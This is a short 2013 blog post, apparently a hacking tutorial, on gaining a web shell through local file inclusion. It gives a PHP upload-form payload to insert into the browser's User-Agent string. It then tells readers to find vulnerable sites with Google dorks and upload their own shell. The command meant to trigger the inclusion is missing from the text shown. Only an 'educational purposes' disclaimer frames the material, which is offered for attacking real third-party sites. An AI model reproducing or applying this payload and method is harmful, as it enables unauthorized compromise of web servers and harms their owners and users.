Saturday, July 27, 2013

TuT - Uploading Shell Via LFI

 Uploading Shell Via LFI

Requirements:-
♦ A Brain
♦Google Chrome (www.google.com/chrome/)
♦User Agent Addon (https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg)
♦A Shell
♦Basic Skills

Step One:-
Download chrome and user agent for chrome (link above).
Then add this String to your user agent string:-

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>mvstats10</p><br> <form action="" method="post" enctype="multipart/form-data">Filename: <input type="file" name="file" /><input type="submit" value="Submit" />



 Select the one which you created.
Now you're done configuring your User Agent

Step Two:-
Find a LFI vulnerable site. Use Google dorks to find vulnerable sites.
Use this code to execute:


When you execute with this code it will show the upload options on the site.
Like this

Now upload your shell by choosing your shell. But be careful most of the shells on Google are backdoor-ed.
 Hope this helped you.
Thanks.

Feel Free To Post Any Comments.

NOTE: This post is for educational purposes only. Other things done are only done at your own risk.
I am not responsible for any activities you do.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)